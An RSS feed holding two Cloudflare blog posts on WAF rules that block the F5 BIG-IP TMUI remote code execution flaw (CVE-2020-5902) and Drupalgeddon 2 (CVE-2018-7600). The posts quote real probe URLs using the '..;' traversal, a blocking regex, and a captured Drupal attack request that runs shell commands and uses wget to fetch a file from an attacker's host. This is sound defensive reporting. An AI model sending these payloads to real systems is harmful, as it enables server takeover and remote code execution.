
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Mon, 06 Apr 2026 03:36:34 GMT</lastBuildDate>
        <item>
            <title><![CDATA[CVE-2020-5902: Helping to protect against the F5 TMUI RCE vulnerability]]></title>
            <link>https://blog.cloudflare.com/cve-2020-5902-helping-to-protect-against-the-f5-tmui-rce-vulnerability/</link>
            <pubDate>Tue, 07 Jul 2020 17:04:41 GMT</pubDate>
            <description><![CDATA[ Cloudflare has deployed a new managed rule protecting customers against a remote code execution vulnerability that has been found in F5 BIG-IP’s web-based Traffic Management User Interface (TMUI). ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare has deployed a new managed rule protecting customers against a <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902">remote code execution vulnerability</a> that has been found in F5 BIG-IP’s web-based Traffic Management User Interface (TMUI). Any customer who has access to the Cloudflare <a href="https://www.cloudflare.com/waf/">Web Application Firewall (WAF)</a> is automatically protected by <a href="https://developers.cloudflare.com/waf/change-log/2020-07-07---emergency-release/">the new rule</a> (100315) that has a default action of BLOCK.</p><p>Initial testing on our network has shown that attackers started probing and trying to exploit this vulnerability starting on July 3.</p><p>F5 has <a href="https://support.f5.com/csp/article/K52145254">published detailed instructions</a> on how to patch affected devices, how to detect if attempts have been made to exploit the vulnerability on a device and instructions on how to add a custom mitigation. If you have an F5 device, read their detailed mitigations before reading the rest of this blog post.</p><p>The most popular probe URL appears to be <code>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp</code> followed by <code>/tmui/login.jsp/..;/tmui/util/getTabSet.jsp,</code> <code>/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp</code> and <code>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp.</code> All contain the critical pattern ..; which is at the heart of the vulnerability.</p><p>On July 3 we saw O(1k) probes ramping to O(1m) yesterday. This is because simple test patterns have been added to scanning tools and small test programs made available by security researchers.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/jomtn8ocHGzcuOT7cCJYs/dd53f8316167f43d3f5667bcaf165099/image1-3.png" />
            
            </figure>
    <div>
      <h3>The Vulnerability</h3>
      <a href="#the-vulnerability">
        
      </a>
    </div>
    <p>The vulnerability was disclosed by the vendor on July 1 and allows both authenticated and unauthenticated users to perform remote code execution (RCE).</p><p>Remote Code Execution is a type of code injection which provides the attacker the ability to run any arbitrary code on the target application, allowing them, in most scenarios such as this one, to gain privileged access and perform a full system take over.</p><p>The vulnerability affects the administration interface only (the management dashboard), not the underlying data plane provided by the application.</p>
    <div>
      <h3>How to Mitigate</h3>
      <a href="#how-to-mitigate">
        
      </a>
    </div>
    <p>If updating the application is not possible, the attack can be mitigated by blocking all requests that match the following regular expression in the URL:</p><p><code>.*\.\.;.*</code></p><p>The above regular expression matches two dot characters (.) followed by a semicolon within any sequence of characters.</p><p>Customers who are using the Cloudflare WAF, that have their F5 BIG-IP TMUI interface proxied behind Cloudflare, are already automatically protected from this vulnerability with rule <code>100315</code>. If you wish to turn off the rule or change the default action:</p><ol><li><p>Head over to the Cloudflare Firewall, then click on Managed Rules and head over to the advanced link under the Cloudflare Managed Rule set,</p></li><li><p>Search for rule ID: <code>100315</code>,</p></li><li><p>Select any appropriate action or disable the rule.</p></li></ol> ]]></content:encoded>
            <category><![CDATA[WAF Rules]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <guid isPermaLink="false">2LT4LqtqK75ouyI8IH3EAV</guid>
            <dc:creator>Michael Tremante</dc:creator>
            <dc:creator>Maitane Zotes</dc:creator>
        </item>
        <item>
            <title><![CDATA[Keeping Drupal sites safe with Cloudflare's WAF]]></title>
            <link>https://blog.cloudflare.com/keeping-drupal-sites-safe-with-cloudflares-waf/</link>
            <pubDate>Fri, 20 Apr 2018 16:14:53 GMT</pubDate>
            <description><![CDATA[ Cloudflare’s team of security analysts monitor for upcoming threats and vulnerabilities and where possible put protection in place for upcoming threats before they compromise our customers. ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare’s team of security analysts monitor for upcoming threats and vulnerabilities and where possible put protection in place for upcoming threats before they compromise our customers. This post examines how we protected people against a new major vulnerability in the Drupal CMS, nicknamed Drupalgeddon 2.</p><p>Two weeks after adding <a href="/drupal-waf-rule-mitigate-critical-exploit/">protection with WAF rule ID D0003</a> which mitigates the critical remote code execution Drupal exploit (<a href="http://www.drupal.org/sa-core-2018-002">SA-CORE-2018-002/CVE-2018-7600</a>), we have seen significant spikes of attack attempts. Since the 13th of April the Drupal security team has been aware of automated attack attempts and it significantly increased the security risk score of the vulnerability. It makes sense to go back and analyse what happened in the last seven days in Cloudflare’s WAF environment.</p>
    <div>
      <h3>What is Drupalgeddon 2</h3>
      <a href="#what-is-drupalgeddon-2">
        
      </a>
    </div>
    <p>The vulnerability potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could make a site completely compromised.</p><p>Drupal introduced renderable arrays, which are a key-value structure, with keys starting with a ‘#’ symbol, that allows you to alter data during form rendering. These arrays however, did not have enough input validation. This means that an attacker could inject a custom renderable array on one of these keys in the form structure.</p>
    <div>
      <h3>The WAF to the rescue</h3>
      <a href="#the-waf-to-the-rescue">
        
      </a>
    </div>
    <p>Cloudflare implemented a WAF rule that would identify malicious requests and block them. We block malicious payloads in GET requests, POST requests and Cookies, which matches the patch made to drupal itself.</p><p>Just during last week, after removing false positives, the rule has blocked more than 500,000 potential attacks, especially at the start of the sample date, when the vulnerability was more recent.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4mA1NiMBuHknowR8vUwgs7/b0e17bb1f764451c1018e9c696ce24f5/Drupal.png" />
            
            </figure><p>Apart from that, we are seeing more than 250 unique IPs per day, mostly IPv4 but also some IPv6 addresses.</p><p>Our analysis shows that most of the attempts are built with a POST request, trying to exploit the ‘mail’ field, with the following being the most used ones:</p>
            <pre><code>MAIL[#POST_RENDER]
MAIL[#MARKUP]
NAME[#POST_RENDER]</code></pre>
            <p>We also found some interesting attack attempts, in which the attacker tried to inject a renderable array on the name field that would copy and download a specific file with access details into a site belonging to the attacker on a most probably compromised domain.</p>
            <pre><code>/q=user/password&amp;name[#post_render[]=system&amp;name[#type]=markup&amp;name[#markup]= chmod 0644 ./sites/default/files/.htaccess;cp/dev/null./sites/default
/files/.htaccess;mkdir./sites/default/files/temp/;wget -P ./sites/default/
files/temp/http://[REDACTED]/blog/wpcontent/uploads/2017/01/example.sites.php;echo"@!!%@"</code></pre>
            <p>The number of blocked requests does not seem to be going down and we keep blocking more than 56,000 potential attacks per day.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/484432IHZHBwDWBLST0CMY/7a09acf3cb32423ab84dc71b925c266f/Drupal2.png" />
            
            </figure> ]]></content:encoded>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Drupal]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[WAF Rules]]></category>
            <guid isPermaLink="false">vmdFR6adxsnnTOGbiYNMI</guid>
            <dc:creator>Maitane Zotes</dc:creator>
        </item>
    </channel>
</rss>